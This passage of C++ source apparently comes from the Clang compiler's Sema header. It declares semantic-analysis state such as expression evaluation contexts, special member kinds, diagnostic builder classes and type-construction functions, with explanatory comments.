S.PopExpressionEvaluationContext();
S.PopFunctionScopeInfo();
}
};
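// Illustrative sketch: synthesize the body of an implicit special member.
//
//   SynthesizedFunctionScope Scope(*this, Constructor);
//   Scope.addContextNote(CurrentLocation);
//   ... build and attach the function body ...
//   // Scopes and evaluation contexts are popped when 'Scope' dies.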
/// WeakUndeclaredIdentifiers - Identifiers that appear in a \#pragma weak
/// before being declared. Rare; each may alias another identifier,
/// declared or undeclared.
llvm::MapVector<IdentifierInfo *, WeakInfo> WeakUndeclaredIdentifiers;
/// ExtnameUndeclaredIdentifiers - Identifiers contained in
/// \#pragma redefine_extname before being declared. Used in Solaris system headers
/// to define functions that occur in multiple standards to call the version
/// in the currently selected standard.
llvm::DenseMap<IdentifierInfo*,AsmLabelAttr*> ExtnameUndeclaredIdentifiers;
/// Load weak undeclared identifiers from the external source.
void LoadExternalWeakUndeclaredIdentifiers();
/// WeakTopLevelDecl - Translation-unit scoped declarations generated by
/// \#pragma weak during processing of other Decls.
/// I couldn't figure out a clean way to generate these in-line, so
/// we store them here and handle them separately -- which is a hack.
/// It would be best to refactor this.
SmallVector<Decl*,2> WeakTopLevelDecl;
IdentifierResolver IdResolver;
/// Translation Unit Scope - useful to Objective-C actions that need
/// to lookup file scope declarations in the "ordinary" C decl namespace.
/// For example, user-defined classes, built-in "id" type, etc.
Scope *TUScope;
/// The C++ "std" namespace, where the standard library resides.
LazyDeclPtr StdNamespace;
/// The C++ "std::bad_alloc" class, which is defined by the C++
/// standard library.
LazyDeclPtr StdBadAlloc;
/// The C++ "std::align_val_t" enum class, which is defined by the C++
/// standard library.
LazyDeclPtr StdAlignValT;
/// The C++ "std::experimental" namespace, where the experimental parts
/// of the standard library reside.
NamespaceDecl *StdExperimentalNamespaceCache;
/// The C++ "std::initializer_list" template, which is defined in
/// \<initializer_list>.
ClassTemplateDecl *StdInitializerList;
/// The C++ "std::coroutine_traits" template, which is defined in
/// \<coroutine_traits>
ClassTemplateDecl *StdCoroutineTraitsCache;
/// The C++ "type_info" declaration, which is defined in \<typeinfo>.
RecordDecl *CXXTypeInfoDecl;
/// The MSVC "_GUID" struct, which is defined in MSVC header files.
RecordDecl *MSVCGuidDecl;
/// Caches identifiers/selectors for NSFoundation APIs.
std::unique_ptr<NSAPI> NSAPIObj;
/// The declaration of the Objective-C NSNumber class.
ObjCInterfaceDecl *NSNumberDecl;
/// The declaration of the Objective-C NSValue class.
ObjCInterfaceDecl *NSValueDecl;
/// Pointer to NSNumber type (NSNumber *).
QualType NSNumberPointer;
/// Pointer to NSValue type (NSValue *).
QualType NSValuePointer;
/// The Objective-C NSNumber methods used to create NSNumber literals.
ObjCMethodDecl *NSNumberLiteralMethods[NSAPI::NumNSNumberLiteralMethods];
/// The declaration of the Objective-C NSString class.
ObjCInterfaceDecl *NSStringDecl;
/// Pointer to NSString type (NSString *).
QualType NSStringPointer;
/// The declaration of the stringWithUTF8String: method.
ObjCMethodDecl *StringWithUTF8StringMethod;
/// The declaration of the valueWithBytes:objCType: method.
ObjCMethodDecl *ValueWithBytesObjCTypeMethod;
/// The declaration of the Objective-C NSArray class.
ObjCInterfaceDecl *NSArrayDecl;
/// The declaration of the arrayWithObjects:count: method.
ObjCMethodDecl *ArrayWithObjectsMethod;
/// The declaration of the Objective-C NSDictionary class.
ObjCInterfaceDecl *NSDictionaryDecl;
/// The declaration of the dictionaryWithObjects:forKeys:count: method.
ObjCMethodDecl *DictionaryWithObjectsMethod;
/// id<NSCopying> type.
QualType QIDNSCopying;
/// Will hold the 'respondsToSelector:' selector.
Selector RespondsToSelectorSel;
/// A flag to remember whether the implicit forms of operator new and delete
/// have been declared.
bool GlobalNewDeleteDeclared;
/// A flag to indicate that we're in a context that permits abstract
/// references to fields, such as MS-style inline assembly (see
/// UnevaluatedAbstract below).
bool AllowAbstractFieldReference;
/// Describes how the expressions currently being parsed are
/// evaluated at run-time, if at all.
enum class ExpressionEvaluationContext {
/// The current expression and its subexpressions occur within an
/// unevaluated operand (C++11 [expr]p7), such as the subexpression of
/// \c sizeof, where the type of the expression may be significant but
/// no code will be generated to evaluate the value of the expression at
/// run time.
Unevaluated,
/// The current expression occurs within a braced-init-list within
/// an unevaluated operand. This is mostly like a regular unevaluated
/// context, except that we still instantiate constexpr functions that are
/// referenced here so that we can perform narrowing checks correctly.
UnevaluatedList,
/// The current expression occurs within a discarded statement.
/// This behaves largely similarly to an unevaluated operand in preventing
/// definitions from being required, but not in other ways.
DiscardedStatement,
/// The current expression occurs within an unevaluated
/// operand that unconditionally permits abstract references to
/// fields, such as a SIZE operator in MS-style inline assembly.
UnevaluatedAbstract,
/// The current context is "potentially evaluated" in C++11 terms,
/// but the expression is evaluated at compile-time (like the values of
/// cases in a switch statement).
ConstantEvaluated,
/// The current expression is potentially evaluated at run time,
/// which means that code may be generated to evaluate the value of the
/// expression at run time.
PotentiallyEvaluated,
/// The current expression is potentially evaluated, but any
/// declarations referenced inside that expression are only used if
/// in fact the current expression is used.
///
/// This value is used when parsing default function arguments, for which
/// we would like to provide diagnostics (e.g., passing non-POD arguments
/// through varargs) but do not want to mark declarations as "referenced"
/// until the default argument is used.
PotentiallyEvaluatedIfUsed
};
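// A few illustrative expressions and the evaluation context of their
// subexpressions (f is a hypothetical function, g a constexpr one):
//
//   sizeof(f());                 // 'f()' is Unevaluated
//   switch (n) { case g(): ; }   // 'g()' is ConstantEvaluated
//   int a = f();                 // 'f()' is PotentiallyEvaluated
//   void h(int x = f());         // 'f()' is PotentiallyEvaluatedIfUsed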
using ImmediateInvocationCandidate = llvm::PointerIntPair<ConstantExpr *, 1>;
/// Data structure used to record current or nested
/// expression evaluation contexts.
struct ExpressionEvaluationContextRecord {
/// The expression evaluation context.
ExpressionEvaluationContext Context;
/// Whether the enclosing context needed a cleanup.
CleanupInfo ParentCleanup;
/// Whether we are in a decltype expression.
bool IsDecltype;
/// The number of active cleanup objects when we entered
/// this expression evaluation context.
unsigned NumCleanupObjects;
/// The number of typos encountered during this expression evaluation
/// context (i.e. the number of TypoExprs created).
unsigned NumTypos;
MaybeODRUseExprSet SavedMaybeODRUseExprs;
/// The lambdas that are present within this context, if it
/// is indeed an unevaluated context.
SmallVector<LambdaExpr *, 2> Lambdas;
/// The declaration that provides context for lambda expressions
/// and block literals if the normal declaration context does not
/// suffice, e.g., in a default function argument.
Decl *ManglingContextDecl;
/// If we are processing a decltype type, a set of call expressions
/// for which we have deferred checking the completeness of the return type.
SmallVector<CallExpr *, 8> DelayedDecltypeCalls;
/// If we are processing a decltype type, a set of temporary binding
/// expressions for which we have deferred checking the destructor.
SmallVector<CXXBindTemporaryExpr *, 8> DelayedDecltypeBinds;
llvm::SmallPtrSet<const Expr *, 8> PossibleDerefs;
/// Expressions appearing as the LHS of a volatile assignment in this
/// context. We produce a warning for these when popping the context if
/// they are neither discarded-value expressions nor unevaluated operands.
SmallVector<Expr*, 2> VolatileAssignmentLHSs;
/// Set of candidates for starting an immediate invocation.
llvm::SmallVector<ImmediateInvocationCandidate, 4> ImmediateInvocationCandidates;
/// Set of DeclRefExprs referencing a consteval function when used in a
/// context not already known to be immediately invoked.
llvm::SmallPtrSet<DeclRefExpr *, 4> ReferenceToConsteval;
/// \brief Describes whether we are in an expression context which we have
/// to handle differently.
enum ExpressionKind {
EK_Decltype, EK_TemplateArgument, EK_Other
} ExprContext;
ExpressionEvaluationContextRecord(ExpressionEvaluationContext Context,
unsigned NumCleanupObjects,
CleanupInfo ParentCleanup,
Decl *ManglingContextDecl,
ExpressionKind ExprContext)
: Context(Context), ParentCleanup(ParentCleanup),
NumCleanupObjects(NumCleanupObjects), NumTypos(0),
ManglingContextDecl(ManglingContextDecl), ExprContext(ExprContext) {}
bool isUnevaluated() const {
return Context == ExpressionEvaluationContext::Unevaluated ||
Context == ExpressionEvaluationContext::UnevaluatedAbstract ||
Context == ExpressionEvaluationContext::UnevaluatedList;
}
bool isConstantEvaluated() const {
return Context == ExpressionEvaluationContext::ConstantEvaluated;
}
};
/// A stack of expression evaluation contexts.
SmallVector<ExpressionEvaluationContextRecord, 8> ExprEvalContexts;
/// Emit a warning for all pending noderef expressions that we recorded.
void WarnOnPendingNoDerefs(ExpressionEvaluationContextRecord &Rec);
/// Compute the mangling number context for a lambda expression or
/// block literal. Also return the extra mangling decl if any.
///
/// \param DC - The DeclContext containing the lambda expression or
/// block literal.
std::tuple<MangleNumberingContext *, Decl *>
getCurrentMangleNumberContext(const DeclContext *DC);
/// SpecialMemberOverloadResult - The overloading result for a special member
/// function.
///
/// This is basically a wrapper around PointerIntPair. The lowest bits of the
/// integer are used to determine whether overload resolution succeeded.
class SpecialMemberOverloadResult {
public:
enum Kind {
NoMemberOrDeleted,
Ambiguous,
Success
};
private:
llvm::PointerIntPair<CXXMethodDecl*, 2> Pair;
public:
SpecialMemberOverloadResult() : Pair() {}
SpecialMemberOverloadResult(CXXMethodDecl *MD)
: Pair(MD, MD->isDeleted() ? NoMemberOrDeleted : Success) {}
CXXMethodDecl *getMethod() const { return Pair.getPointer(); }
void setMethod(CXXMethodDecl *MD) { Pair.setPointer(MD); }
Kind getKind() const { return static_cast<Kind>(Pair.getInt()); }
void setKind(Kind K) { Pair.setInt(K); }
};
class SpecialMemberOverloadResultEntry
: public llvm::FastFoldingSetNode,
public SpecialMemberOverloadResult {
public:
SpecialMemberOverloadResultEntry(const llvm::FoldingSetNodeID &ID)
: FastFoldingSetNode(ID)
{}
};
/// A cache of special member function overload resolution results
/// for C++ records.
llvm::FoldingSet<SpecialMemberOverloadResultEntry> SpecialMemberCache;
/// A cache of the flags available in enumerations with the flag_bits
/// attribute.
mutable llvm::DenseMap<const EnumDecl*, llvm::APInt> FlagBitsCache;
/// The kind of translation unit we are processing.
///
/// When we're processing a complete translation unit, Sema will perform
/// end-of-translation-unit semantic tasks (such as creating
/// initializers for tentative definitions in C) once parsing has
/// completed. Modules and precompiled headers perform different kinds of
/// checks.
TranslationUnitKind TUKind;
llvm::BumpPtrAllocator BumpAlloc;
/// The number of SFINAE diagnostics that have been trapped.
unsigned NumSFINAEErrors;
typedef llvm::DenseMap<ParmVarDecl *, llvm::TinyPtrVector<ParmVarDecl *>>
UnparsedDefaultArgInstantiationsMap;
/// A mapping from parameters with unparsed default arguments to the
/// set of instantiations of each parameter.
///
/// This mapping is a temporary data structure used when parsing
/// nested class templates or nested classes of class templates,
/// where we might end up instantiating an inner class before the
/// default arguments of its methods have been parsed.
UnparsedDefaultArgInstantiationsMap UnparsedDefaultArgInstantiations;
// Contains the locations of the beginning of unparsed default
// arguments.
llvm::DenseMap<ParmVarDecl *, SourceLocation> UnparsedDefaultArgLocs;
/// UndefinedButUsed - all the used, undefined objects which require a
/// definition in this translation unit.
llvm::MapVector<NamedDecl *, SourceLocation> UndefinedButUsed;
/// Determine if VD, which must be a variable or function, is an external
/// symbol that nonetheless can't be referenced from outside this translation
/// unit because its type has no linkage and it's not extern "C".
bool isExternalWithNoLinkageType(ValueDecl *VD);
/// Obtain a sorted list of functions that are undefined but ODR-used.
void getUndefinedButUsed(
SmallVectorImpl<std::pair<NamedDecl *, SourceLocation> > &Undefined);
/// Retrieves list of suspicious delete-expressions that will be checked at
/// the end of translation unit.
const llvm::MapVector<FieldDecl *, DeleteLocs> &
getMismatchingDeleteExpressions() const;
typedef std::pair<ObjCMethodList, ObjCMethodList> GlobalMethods;
typedef llvm::DenseMap<Selector, GlobalMethods> GlobalMethodPool;
/// Method Pool - allows efficient lookup when typechecking messages to "id".
/// We need to maintain a list, since selectors can have differing signatures
/// across classes. In Cocoa, this happens to be extremely uncommon (only 1%
/// of selectors are "overloaded").
/// At the head of the list it is recorded whether there were 0, 1, or >= 2
/// methods inside categories with a particular selector.
GlobalMethodPool MethodPool;
/// Method selectors used in a \@selector expression. Used for implementation
/// of -Wselector.
llvm::MapVector<Selector, SourceLocation> ReferencedSelectors;
/// List of SourceLocations where 'self' is implicitly retained inside a
/// block.
llvm::SmallVector<std::pair<SourceLocation, const BlockDecl *>, 1>
ImplicitlyRetainedSelfLocs;
/// Kinds of C++ special members.
enum CXXSpecialMember {
CXXDefaultConstructor,
CXXCopyConstructor,
CXXMoveConstructor,
CXXCopyAssignment,
CXXMoveAssignment,
CXXDestructor,
CXXInvalid
};
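// For reference, each kind corresponds to one of these members:
//
//   struct X {
//     X();                        // CXXDefaultConstructor
//     X(const X &);               // CXXCopyConstructor
//     X(X &&);                    // CXXMoveConstructor
//     X &operator=(const X &);    // CXXCopyAssignment
//     X &operator=(X &&);         // CXXMoveAssignment
//     ~X();                       // CXXDestructor
//   };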
typedef llvm::PointerIntPair<CXXRecordDecl *, 3, CXXSpecialMember>
SpecialMemberDecl;
/// The C++ special members which we are currently in the process of
/// declaring. If this process recursively triggers the declaration of the
/// same special member, we should act as if it is not yet declared.
llvm::SmallPtrSet<SpecialMemberDecl, 4> SpecialMembersBeingDeclared;
/// Kinds of defaulted comparison operator functions.
enum class DefaultedComparisonKind : unsigned char {
/// This is not a defaultable comparison operator.
None,
/// This is an operator== that should be implemented as a series of
/// subobject comparisons.
Equal,
/// This is an operator<=> that should be implemented as a series of
/// subobject comparisons.
ThreeWay,
/// This is an operator!= that should be implemented as a rewrite in terms
/// of a == comparison.
NotEqual,
/// This is an <, <=, >, or >= that should be implemented as a rewrite in
/// terms of a <=> comparison.
Relational,
};
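// Illustrative mapping from defaulted comparison declarations (C++20) to
// the kinds above:
//
//   struct Y {
//     int a, b;
//     bool operator==(const Y &) const = default;  // Equal
//     auto operator<=>(const Y &) const = default; // ThreeWay
//     bool operator!=(const Y &) const = default;  // NotEqual
//     bool operator<(const Y &) const = default;   // Relational
//   };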
/// The function definitions which were renamed as part of typo-correction
/// to match their respective declarations. We want to keep track of them
/// to ensure that we don't emit a "redefinition" error if we encounter a
/// correctly named definition after the renamed definition.
llvm::SmallPtrSet<const NamedDecl *, 4> TypoCorrectedFunctionDefinitions;
/// Stack of types that correspond to the parameter entities that are
/// currently being copy-initialized. Can be empty.
llvm::SmallVector<QualType, 4> CurrentParameterCopyTypes;
void ReadMethodPool(Selector Sel);
void updateOutOfDateSelector(Selector Sel);
/// Private Helper predicate to check for 'self'.
bool isSelfExpr(Expr *RExpr);
bool isSelfExpr(Expr *RExpr, const ObjCMethodDecl *Method);
/// Cause the active diagnostic on the DiagnosticsEngine to be
/// emitted. This is closely coupled to the SemaDiagnosticBuilder class and
/// should not be used elsewhere.
void EmitCurrentDiagnostic(unsigned DiagID);
/// Records and restores the FPFeatures state on entry/exit of compound
/// statements.
class FPFeaturesStateRAII {
public:
FPFeaturesStateRAII(Sema &S) : S(S), OldFPFeaturesState(S.FPFeatures) {}
~FPFeaturesStateRAII() { S.FPFeatures = OldFPFeaturesState; }
private:
Sema& S;
FPOptions OldFPFeaturesState;
};
void addImplicitTypedef(StringRef Name, QualType T);
bool WarnedStackExhausted = false;
public:
Sema(Preprocessor &pp, ASTContext &ctxt, ASTConsumer &consumer,
TranslationUnitKind TUKind = TU_Complete,
CodeCompleteConsumer *CompletionConsumer = nullptr);
~Sema();
/// Perform initialization that occurs after the parser has been
/// initialized but before it parses anything.
void Initialize();
const LangOptions &getLangOpts() const { return LangOpts; }
OpenCLOptions &getOpenCLOptions() { return OpenCLFeatures; }
FPOptions &getFPOptions() { return FPFeatures; }
DiagnosticsEngine &getDiagnostics() const { return Diags; }
SourceManager &getSourceManager() const { return SourceMgr; }
Preprocessor &getPreprocessor() const { return PP; }
ASTContext &getASTContext() const { return Context; }
ASTConsumer &getASTConsumer() const { return Consumer; }
ASTMutationListener *getASTMutationListener() const;
ExternalSemaSource* getExternalSource() const { return ExternalSource; }
/// Registers an external source. If an external source already exists,
/// creates a multiplex external source and appends to it.
///
/// \param[in] E - A non-null external sema source.
///
void addExternalSource(ExternalSemaSource *E);
void PrintStats() const;
/// Warn that the stack is nearly exhausted.
void warnStackExhausted(SourceLocation Loc);
/// Run some code with "sufficient" stack space. (Currently, at least 256K is
/// guaranteed). Produces a warning if we're low on stack space and allocates
/// more in that case. Use this in code that may recurse deeply (for example,
/// in template instantiation) to avoid stack overflow.
void runWithSufficientStackSpace(SourceLocation Loc,
llvm::function_ref<void()> Fn);
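// Illustrative sketch (the callee is hypothetical): wrap deeply recursive
// work so that it gets fresh stack when the current stack is nearly
// exhausted.
//
//   runWithSufficientStackSpace(Loc, [&] {
//     Result = instantiateDeeplyNestedTemplate(TL);
//   });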
/// Helper class that creates diagnostics with optional
/// template instantiation stacks.
///
/// This class provides a wrapper around the basic DiagnosticBuilder
/// class that emits diagnostics. SemaDiagnosticBuilder is
/// responsible for emitting the diagnostic (as DiagnosticBuilder
/// does) and, if the diagnostic comes from inside a template
/// instantiation, printing the template instantiation stack as
/// well.
class SemaDiagnosticBuilder : public DiagnosticBuilder {
Sema &SemaRef;
unsigned DiagID;
public:
SemaDiagnosticBuilder(DiagnosticBuilder &DB, Sema &SemaRef, unsigned DiagID)
: DiagnosticBuilder(DB), SemaRef(SemaRef), DiagID(DiagID) { }
// This is a cunning lie. DiagnosticBuilder actually performs move
// construction in its copy constructor (but due to varied uses, it's not
// possible to conveniently express this as actual move construction). So
// the default copy ctor here is fine, because the base class disables the
// source anyway, so the user-defined ~SemaDiagnosticBuilder is a safe no-op
// in that case anyway.
SemaDiagnosticBuilder(const SemaDiagnosticBuilder&) = default;
~SemaDiagnosticBuilder() {
// If we aren't active, there is nothing to do.
if (!isActive()) return;
// Otherwise, we need to emit the diagnostic. First flush the underlying
// DiagnosticBuilder data, and clear the diagnostic builder itself so it
// won't emit the diagnostic in its own destructor.
//
// This seems wasteful, in that as written the DiagnosticBuilder dtor will
// do its own needless checks to see if the diagnostic needs to be
// emitted. However, because we take care to ensure that the builder
// objects never escape, a sufficiently smart compiler will be able to
// eliminate that code.
FlushCounts();
Clear();
// Dispatch to Sema to emit the diagnostic.
SemaRef.EmitCurrentDiagnostic(DiagID);
}
/// Teach operator<< to produce an object of the correct type.
template<typename T>
friend const SemaDiagnosticBuilder &operator<<(
const SemaDiagnosticBuilder &Diag, const T &Value) {
const DiagnosticBuilder &BaseDiag = Diag;
BaseDiag << Value;
return Diag;
}
};
/// Emit a diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID) {
DiagnosticBuilder DB = Diags.Report(Loc, DiagID);
return SemaDiagnosticBuilder(DB, *this, DiagID);
}
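// Typical usage: arguments are streamed into the builder, and the
// diagnostic (plus any template instantiation stack) is emitted in the
// builder's destructor. Sketch with a hypothetical diagnostic ID:
//
//   Diag(D->getLocation(), diag::err_some_problem) << D->getDeclName();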
/// Emit a partial diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, const PartialDiagnostic& PD);
/// Build a partial diagnostic.
PartialDiagnostic PDiag(unsigned DiagID = 0); // in SemaInternal.h
bool findMacroSpelling(SourceLocation &loc, StringRef name);
/// Get a string to suggest for zero-initialization of a type.
std::string
getFixItZeroInitializerForType(QualType T, SourceLocation Loc) const;
std::string getFixItZeroLiteralForType(QualType T, SourceLocation Loc) const;
/// Calls \c Lexer::getLocForEndOfToken()
SourceLocation getLocForEndOfToken(SourceLocation Loc, unsigned Offset = 0);
/// Retrieve the module loader associated with the preprocessor.
ModuleLoader &getModuleLoader() const;
/// Invent a new identifier for parameters of abbreviated templates.
IdentifierInfo *
InventAbbreviatedTemplateParameterTypeName(IdentifierInfo *ParamName,
unsigned Index);
void emitAndClearUnusedLocalTypedefWarnings();
private:
/// Function or variable declarations to be checked for whether the deferred
/// diagnostics should be emitted.
SmallVector<Decl *, 4> DeclsToCheckForDeferredDiags;
public:
// Emit all deferred diagnostics.
void emitDeferredDiags();
enum TUFragmentKind {
/// The global module fragment, between 'module;' and a module-declaration.
Global,
/// A normal translation unit fragment. For a non-module unit, this is the
/// entire translation unit. Otherwise, it runs from the module-declaration
/// to the private-module-fragment (if any) or the end of the TU (if not).
Normal,
/// The private module fragment, between 'module :private;' and the end of
/// the translation unit.
Private
};
void ActOnStartOfTranslationUnit();
void ActOnEndOfTranslationUnit();
void ActOnEndOfTranslationUnitFragment(TUFragmentKind Kind);
void CheckDelegatingCtorCycles();
Scope *getScopeForContext(DeclContext *Ctx);
void PushFunctionScope();
void PushBlockScope(Scope *BlockScope, BlockDecl *Block);
sema::LambdaScopeInfo *PushLambdaScope();
/// This is used to inform Sema what the current TemplateParameterDepth
/// is during Parsing. Currently it is used to pass on the depth
/// when parsing generic lambda 'auto' parameters.
void RecordParsingTemplateParameterDepth(unsigned Depth);
void PushCapturedRegionScope(Scope *RegionScope, CapturedDecl *CD,
RecordDecl *RD, CapturedRegionKind K,
unsigned OpenMPCaptureLevel = 0);
/// Custom deleter to allow FunctionScopeInfos to be kept alive for a short
/// time after they've been popped.
class PoppedFunctionScopeDeleter {
Sema *Self;
public:
explicit PoppedFunctionScopeDeleter(Sema *Self) : Self(Self) {}
void operator()(sema::FunctionScopeInfo *Scope) const;
};
using PoppedFunctionScopePtr =
std::unique_ptr<sema::FunctionScopeInfo, PoppedFunctionScopeDeleter>;
PoppedFunctionScopePtr
PopFunctionScopeInfo(const sema::AnalysisBasedWarnings::Policy *WP = nullptr,
const Decl *D = nullptr,
QualType BlockType = QualType());
sema::FunctionScopeInfo *getCurFunction() const {
return FunctionScopes.empty() ? nullptr : FunctionScopes.back();
}
sema::FunctionScopeInfo *getEnclosingFunction() const;
void setFunctionHasBranchIntoScope();
void setFunctionHasBranchProtectedScope();
void setFunctionHasIndirectGoto();
void PushCompoundScope(bool IsStmtExpr);
void PopCompoundScope();
sema::CompoundScopeInfo &getCurCompoundScope() const;
bool hasAnyUnrecoverableErrorsInThisFunction() const;
/// Retrieve the current block, if any.
sema::BlockScopeInfo *getCurBlock();
/// Get the innermost lambda enclosing the current location, if any. This
/// looks through intervening non-lambda scopes such as local functions and
/// blocks.
sema::LambdaScopeInfo *getEnclosingLambda() const;
/// Retrieve the current lambda scope info, if any.
/// \param IgnoreNonLambdaCapturingScope true if we should find the top-most
/// lambda scope info, ignoring all inner capturing scopes that are not
/// lambda scopes.
sema::LambdaScopeInfo *
getCurLambda(bool IgnoreNonLambdaCapturingScope = false);
/// Retrieve the current generic lambda info, if any.
sema::LambdaScopeInfo *getCurGenericLambda();
/// Retrieve the current captured region, if any.
sema::CapturedRegionScopeInfo *getCurCapturedRegion();
/// WeakTopLevelDeclDecls - access to \#pragma weak-generated Decls
SmallVectorImpl<Decl *> &WeakTopLevelDecls() { return WeakTopLevelDecl; }
/// Called before parsing a function declarator belonging to a function
/// declaration.
void ActOnStartFunctionDeclarationDeclarator(Declarator &D,
unsigned TemplateParameterDepth);
/// Called after parsing a function declarator belonging to a function
/// declaration.
void ActOnFinishFunctionDeclarationDeclarator(Declarator &D);
void ActOnComment(SourceRange Comment);
//===--------------------------------------------------------------------===//
// Type Analysis / Processing: SemaType.cpp.
//
QualType BuildQualifiedType(QualType T, SourceLocation Loc, Qualifiers Qs,
const DeclSpec *DS = nullptr);
QualType BuildQualifiedType(QualType T, SourceLocation Loc, unsigned CVRA,
const DeclSpec *DS = nullptr);
QualType BuildPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildReferenceType(QualType T, bool LValueRef,
SourceLocation Loc, DeclarationName Entity);
QualType BuildArrayType(QualType T, ArrayType::ArraySizeModifier ASM,
Expr *ArraySize, unsigned Quals,
SourceRange Brackets, DeclarationName Entity);
QualType BuildVectorType(QualType T, Expr *VecSize, SourceLocation AttrLoc);
QualType BuildExtVectorType(QualType T, Expr *ArraySize,
SourceLocation AttrLoc);
QualType BuildAddressSpaceAttr(QualType &T, LangAS ASIdx, Expr *AddrSpace,
SourceLocation AttrLoc);
/// Same as above, but constructs the AddressSpace index if not provided.
QualType BuildAddressSpaceAttr(QualType &T, Expr *AddrSpace,
SourceLocation AttrLoc);
bool CheckQualifiedFunctionForTypeId(QualType T, SourceLocation Loc);
bool CheckFunctionReturnType(QualType T, SourceLocation Loc);
/// Build a function type.
///
/// This routine checks the function type according to C++ rules and
/// under the assumption that the result type and parameter types have
/// just been instantiated from a template. It therefore duplicates
/// some of the behavior of GetTypeForDeclarator, but in a much
/// simpler form that is only suitable for this narrow use case.
///
/// \param T The return type of the function.
///
/// \param ParamTypes The parameter types of the function. This array
/// will be modified to account for adjustments to the types of the
/// function parameters.
///
/// \param Loc The location of the entity whose type involves this
/// function type or, if there is no such entity, the location of the
/// type that will have function type.
///
/// \param Entity The name of the entity that involves the function
/// type, if known.
///
/// \param EPI Extra information about the function type. Usually this will
/// be taken from an existing function with the same prototype.
///
/// \returns A suitable function type, if there are no errors. The
/// unqualified type will always be a FunctionProtoType.
/// Otherwise, returns a NULL type.
QualType BuildFunctionType(QualType T,
MutableArrayRef<QualType> ParamTypes,
SourceLocation Loc, DeclarationName Entity,
const FunctionProtoType::ExtProtoInfo &EPI);
QualType BuildMemberPointerType(QualType T, QualType Class,
SourceLocation Loc,
DeclarationName Entity);
QualType BuildBlockPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildParenType(QualType T);
QualType BuildAtomicType(QualType T, SourceLocation Loc);
QualType BuildReadPipeType(QualType T,
SourceLocation Loc);
QualType BuildWritePipeType(QualType T,
SourceLocation Loc);
TypeSourceInfo *GetTypeForDeclarator(Declarator &D, Scope *S);
TypeSourceInfo *GetTypeForDeclaratorCast(Declarator &D, QualType FromTy);
/// Package the given type and TSI into a ParsedType.
ParsedType CreateParsedType(QualType T, TypeSourceInfo *TInfo);
DeclarationNameInfo GetNameForDeclarator(Declarator &D);
DeclarationNameInfo GetNameFromUnqualifiedId(const UnqualifiedId &Name);
static QualType GetTypeFromParser(ParsedType Ty,
TypeSourceInfo **TInfo = nullptr);
CanThrowResult canThrow(const Stmt *E);
const FunctionProtoType *ResolveExceptionSpec(SourceLocation Loc,
const FunctionProtoType *FPT);
void UpdateExceptionSpec(FunctionDecl *FD,
const FunctionProtoType::ExceptionSpecInfo &ESI);
bool CheckSpecifiedExceptionType(QualType &T, SourceRange Range);
bool CheckDistantExceptionSpec(QualType T);
bool CheckEquivalentExceptionSpec(FunctionDecl *Old, FunctionDecl *New);
bool CheckEquivalentExceptionSpec(
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool CheckEquivalentExceptionSpec(
const PartialDiagnostic &DiagID, const PartialDiagnostic & NoteID,
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool handlerCanCatch(QualType HandlerType, QualType ExceptionType);
bool CheckExceptionSpecSubset(const PartialDiagnostic &DiagID,
const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const PartialDiagnostic &NoThrowDiagID,
const FunctionProtoType *Superset,
SourceLocation SuperLoc,
const FunctionProtoType *Subset,
SourceLocation SubLoc);
bool CheckParamExceptionSpec(const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const FunctionProtoType *Target,
SourceLocation TargetLoc,
const FunctionProtoType *Source,
SourceLocation SourceLoc);
TypeResult ActOnTypeName(Scope *S, Declarator &D);
/// The parser has parsed the context-sensitive type 'instancetype'
/// in an Objective-C message declaration. Return the appropriate type.
ParsedType ActOnObjCInstanceType(SourceLocation Loc);
/// Abstract class used to diagnose incomplete types.
struct TypeDiagnoser {
TypeDiagnoser() {}
virtual void diagnose(Sema &S, SourceLocation Loc, QualType T) = 0;
virtual ~TypeDiagnoser() {}
};
static int getPrintable(int I) { return I; }
static unsigned getPrintable(unsigned I) { return I; }
static bool getPrintable(bool B) { return B; }
static const char * getPrintable(const char *S) { return S; }
static StringRef getPrintable(StringRef S) { return S; }
static const std::string &getPrintable(const std::string &S) { return S; }
static const IdentifierInfo *getPrintable(const IdentifierInfo *II) {
return II;
}
static DeclarationName getPrintable(DeclarationName N) { return N; }
static QualType getPrintable(QualType T) { return T; }
static SourceRange getPrintable(SourceRange R) { return R; }
static SourceRange getPrintable(SourceLocation L) { return L; }
static SourceRange getPrintable(const Expr *E) { return E->getSourceRange(); }
static SourceRange getPrintable(TypeLoc TL) { return TL.getSourceRange();}
template <typename... Ts> class BoundTypeDiagnoser : public TypeDiagnoser {
protected:
unsigned DiagID;
std::tuple<const Ts &...> Args;
template <std::size_t... Is>
void emit(const SemaDiagnosticBuilder &DB,
std::index_sequence<Is...>) const {
// Apply all tuple elements to the builder in order.
bool Dummy[] = {false, (DB << getPrintable(std::get<Is>(Args)))...};
(void)Dummy;
}
public:
BoundTypeDiagnoser(unsigned DiagID, const Ts &...Args)
: TypeDiagnoser(), DiagID(DiagID), Args(Args...) {
assert(DiagID != 0 && "no diagnostic for type diagnoser");
}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, DiagID);
emit(DB, std::index_sequence_for<Ts...>());
DB << T;
}
};
/// Do a check to make sure \p Name looks like a legal swift_name
/// attribute for the decl \p D. Raise a diagnostic if the name is invalid
/// for the given declaration.
///
/// For a function, this will validate a compound Swift name,
/// e.g. <code>init(foo:bar:baz:)</code> or <code>controllerForName(_:)</code>,
/// and the function will output the number of parameter names, and whether
/// this is a single-arg initializer.
///
/// For a type, enum constant, property, or variable declaration, this will
/// validate either a simple identifier, or a qualified
/// <code>context.identifier</code> name.
///
/// \returns true if the name is a valid swift name for \p D, false otherwise.
bool DiagnoseSwiftName(Decl *D, StringRef Name,
SourceLocation ArgLoc,
const IdentifierInfo *AttrName);
/// A derivative of BoundTypeDiagnoser for which the diagnostic's type
/// parameter is preceded by a 0/1 enum that is 1 if the type is sizeless.
/// For example, a diagnostic with no other parameters would generally have
/// the form "...%select{incomplete|sizeless}0 type %1...".
template <typename... Ts>
